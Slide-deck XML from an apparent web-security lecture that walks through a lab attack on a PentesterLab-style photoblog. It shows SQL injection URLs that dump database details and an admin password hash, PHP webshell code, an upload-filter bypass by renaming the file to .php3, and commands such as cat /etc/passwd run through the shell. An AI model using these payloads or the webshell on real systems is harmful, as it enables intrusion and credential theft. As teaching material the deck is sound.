            <a:off x="4521750" y="2662825"/>
            <a:ext cx="1688148" cy="1256040"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator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 Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="134" name="Shape 134"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="133" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904350" y="3014545"/>
            <a:ext cx="3617400" cy="2763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5" name="Shape 135"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="874350" y="3506875"/>
            <a:ext cx="3687600" cy="1506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6" name="Shape 136"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="133" idx="3"/>
            <a:endCxn id="128" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6209898" y="3290845"/>
            <a:ext cx="5727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37" name="Shape 137"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="132" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6139425" y="2431795"/>
            <a:ext cx="532800" cy="49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38" name="Shape 138"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6029000" y="3918850"/>
            <a:ext cx="834000" cy="70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39" name="Shape 139"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="133" idx="2"/>
            <a:endCxn id="130" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5365824" y="3918865"/>
            <a:ext cx="513900" cy="67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140" name="Shape 140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513286" y="1557500"/>
            <a:ext cx="2100114" cy="1205820"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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Click jacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Shape 141"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="208486" y="3691100"/>
            <a:ext cx="1656072" cy="1205820"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Shape 142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122886" y="4072100"/>
            <a:ext cx="1656072" cy="1205820"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Shape 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2613400" y="1883845"/>
            <a:ext cx="1332000" cy="10959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Packet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Sniffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Shape 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206200" y="3251480"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Parameter 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Tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Shape 145"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797000" y="3784880"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Forged Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5711400" y="3708680"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Direct Object Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Shape 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787600" y="2946680"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Shape 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492200" y="2260880"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Directory Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Shape 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016200" y="1422680"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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XML Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Shape 150"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5648202" y="1704166"/>
            <a:ext cx="782700" cy="77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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Shape 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581182" y="1704166"/>
            <a:ext cx="935400" cy="77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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 152"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3943588" y="4752166"/>
            <a:ext cx="1115700" cy="77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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Shape 153"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4172188" y="5590366"/>
            <a:ext cx="1115700" cy="77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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Shape 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5391388" y="5666566"/>
            <a:ext cx="1115700" cy="77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MORE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Shape 155"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290425" y="1734450"/>
            <a:ext cx="7576092" cy="4925826"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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/>
              <a:t>Huge attack surface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Manually detecting SQLi vuln</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Shape 67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http://192.168.43.130/cat.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'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This will escape the prepared sql statement, breaking the syntax, and resuling in a SQL error.  This tells us that it is running SQL, and has a SQLi vuln. There many ways to do this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You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 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This is an example of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error-Based SQL Injection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Well..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Shape 68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 seems that only that ONE page (cat.php) has a vulnerability with the id parameter.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rest of the results aren't SQLi related, and we've covered those topics before.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OK so lets exploit this single vulnerability (SQLi time)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="Shape 69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http://192.168.43.130/cat.php?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=1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SQLi vulnerable, but we don't know what the SQL query behind it in the cat.php code looks like.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So lets find out how many columns it is requesting.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Union-Based SQLi for beginners</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696" name="Shape 69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 FACT:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>All queries in a SQL statement containing UNION operator must have an equal number of expressions in their target lists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i.e.....  A UNION B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must have the same # of columns.  But we can use this to enumerate the columns of a statement.....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Union-Based SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Shape 70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http://192.168.43.130/cat.php?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1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UNION SELECT ALL 1--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The used SELECT statements have a different number of columns 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http://192.168.43.130/cat.php?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT ALL 1,2--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The used SELECT statements have a different number of columns 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http://192.168.43.130/cat.php?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT ALL 1,2,3--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The used SELECT statements have a different number of columns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u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"The UNION SELECT ALL ...." part is a common SQLi trick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703" name="Shape 703"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947650" y="2199125"/>
            <a:ext cx="21555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FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is integer based, so no tick required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Union-Based SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="709" name="Shape 70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http://192.168.43.130/cat.php?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT ALL 1,2,3,4--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Success! we get a valid, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>populated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> webpage back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So this prepared statement has 4 columns.  This technique works when SQL error messages are disabled (and Error-Based SQLi does not work).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i="1" lang="en"/>
              <a:t>toying around with these params will reveal what does what.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Union-Based SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715" name="Shape 71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OK its 4 columns, lets try unioning with other tables.... but we need to find the tables and other info.... like:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database(), user(), @@version,@@datadir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716" name="Shape 716"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="687400" y="362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{927AFFBE-70E4-4FC7-8A94-46933CCBDF17}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http://192.168.43.130/cat.php?id=1 UNION SELECT 1, database(), 2, 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reveals database name == photoblog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http://192.168.43.130/cat.php?id=1 UNION SELECT 1, user(), 2, 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reveals database name == pentesterlab@localhost</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="5649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http://192.168.43.130/cat.php?id=1 UNION SELECT 1, @@version, 2, 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/>
                        <a:t>reveals db version == 5.1.63-0+squeeze1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http://192.168.43.130/cat.php?id=1 UNION SELECT 1, @@datadir, 2, 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reveals the DB is stored in /var/lib/mysql/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Lets get the table names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="722" name="Shape 72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Most SQL Databases have a table in each database called "</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>", which is always interesting.  We can grab all table names and column names from it. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Once you know the DB type and version, this info is easy to determine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 can use the following SQLi to extract this info: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... UNION SELECT 1, table_name, 3, 4 from information_schema.columns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ok there's a user's table, lets get some column names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="728" name="Shape 72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can use this same technique to get all the column names across the DB.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... UNION SELECT 1, column_name, 3, 4 from information_schema.columns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Reveals the following interesting column names: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id, privileges, user, host, db, command, login password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Excellent, lets break in to the admin console</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734" name="Shape 73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...UNION SELECT 1, login, 3, 4 from users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reveals a login of "admin"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... UNION SELECT 1, password, 3, 4 from users</a:t>
            </a:r>
          </a:p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/>
              <a:t>reveals a password hash of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8efe310f9ab3efeae8d410a8e0166eb2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which after cracking reveals the password is:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>P4ssw0rd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 used http://www.md5decrypter.co.uk/ and it took seconds.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>moral of the story: MD5 is dead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Obligatory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Comic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958" y="168835"/>
            <a:ext cx="4907842" cy="6401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 txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="38844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We can't stop here...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="740" name="Shape 74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its sh3ll country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That was just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admin console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for that stupid website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41" name="Shape 7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0962" y="-75693"/>
            <a:ext cx="4919237" cy="6955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can upload a file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747" name="Shape 74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Hmm what could go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wrong?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="748" name="Shape 7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925" y="1600200"/>
            <a:ext cx="395287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Uploading a webshell and Code Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="754" name="Shape 75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&lt;? php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system($_GET['cmd'])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?&gt;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This code when put into ANY webpage can be a small webshell.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The code will take the content of the parameter cmd and executes it... i.e.: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192.168.1.130/admin/uploads/shell.php?cmd=ls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 webshell code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="Shape 76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&lt;?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if ( strcmp( $_GET['cmd'], "" ) == 0 ){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echo "15825b40c6dace2a" . "7cf5d4ab8ed434d5";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}else{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system ( $_GET['cmd'] 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?&gt;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This bypasses T_String parse error.  Found in w3af attack payloads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shell notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="766" name="Shape 76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Each command you run is run in a brand new context, independent of previous commands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the webshell has the same privileges as the web server running the php script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There are ways to filter out uploaded php,python, etc files... but there also ways around those filters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i="1" lang="en"/>
              <a:t>you can easily </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en"/>
              <a:t>trojanize </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>any open source webapps (i.e. drupal, wordpress, etc..) by adding webshell code to them and overriding the target file on the webserver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Fail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="772" name="Shape 77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 seems to filter out the php file somehow. And spews back this error:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"NO PHP!!"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Bypassing the filter: file-type fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="778" name="Shape 778"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="13719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uploading a .jpg gives us the following.  Pay attention to the content type at the bottom...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Here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="779" name="Shape 7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0" y="1600200"/>
            <a:ext cx="72771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Shape 780"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="968400" y="5426425"/>
            <a:ext cx="841500" cy="35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Bypassing the filter: file-type fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="786" name="Shape 786"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="13371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The webshell is interpreted as "application/octet-stream" content.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Lets change that to "image/jpeg" and see what happens to the filter.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="787" name="Shape 7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325" y="1531750"/>
            <a:ext cx="73056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Still fail </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="793" name="Shape 79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Must be filtering by something else,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try renaming it to shell.php3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.php3 is a still recognized artifact filetype from the late 90's when php was young.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="794" name="Shape 7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8538" y="2708763"/>
            <a:ext cx="364807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Success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="800" name="Shape 8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4776" y="4131488"/>
            <a:ext cx="3639224" cy="2726513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Shape 80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http://192.168.43.130/admin/uploads/webshell.php3?cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>whoami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reveals it is being run under account "www-data"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 try: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>http....</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>/admin/uploads/webshell.php3?cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" u="sng"/>
              <a:t>cat /etc/passwd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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GAME OVER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20075"/>
            <a:ext cx="2679700" cy="17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Big Picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Shape 169"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924507" y="3756338"/>
            <a:ext cx="1175400" cy="11433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170" name="Shape 170"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4811469" y="3988142"/>
            <a:ext cx="1701900" cy="7284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FIREWALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Shape 171"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610621" y="4968357"/>
            <a:ext cx="1191000" cy="92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Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Shape 172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916630" y="4968357"/>
            <a:ext cx="1191000" cy="92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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Shape 173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836664" y="2787097"/>
            <a:ext cx="1263300" cy="92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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Shape 174"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125575" y="3434605"/>
            <a:ext cx="1343250" cy="999432"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator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 Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="175" name="Shape 175"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="174" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2458075" y="3244621"/>
            <a:ext cx="3667500" cy="6897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6" name="Shape 176"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2199961" y="3539498"/>
            <a:ext cx="3957600" cy="5667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7" name="Shape 177"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="174" idx="3"/>
            <a:endCxn id="169" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468825" y="3934321"/>
            <a:ext cx="455700" cy="39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78" name="Shape 178"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="173" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7412764" y="3250747"/>
            <a:ext cx="423900" cy="39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79" name="Shape 179"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7324863" y="4433998"/>
            <a:ext cx="663600" cy="55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80" name="Shape 180"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="174" idx="2"/>
            <a:endCxn id="171" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797200" y="4434037"/>
            <a:ext cx="408900" cy="53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181" name="Shape 181"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7021870" y="2671820"/>
            <a:ext cx="622800" cy="61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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Shape 182"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172864" y="2671820"/>
            <a:ext cx="744300" cy="61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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Shape 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5665543" y="5097051"/>
            <a:ext cx="887700" cy="61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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Shape 184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
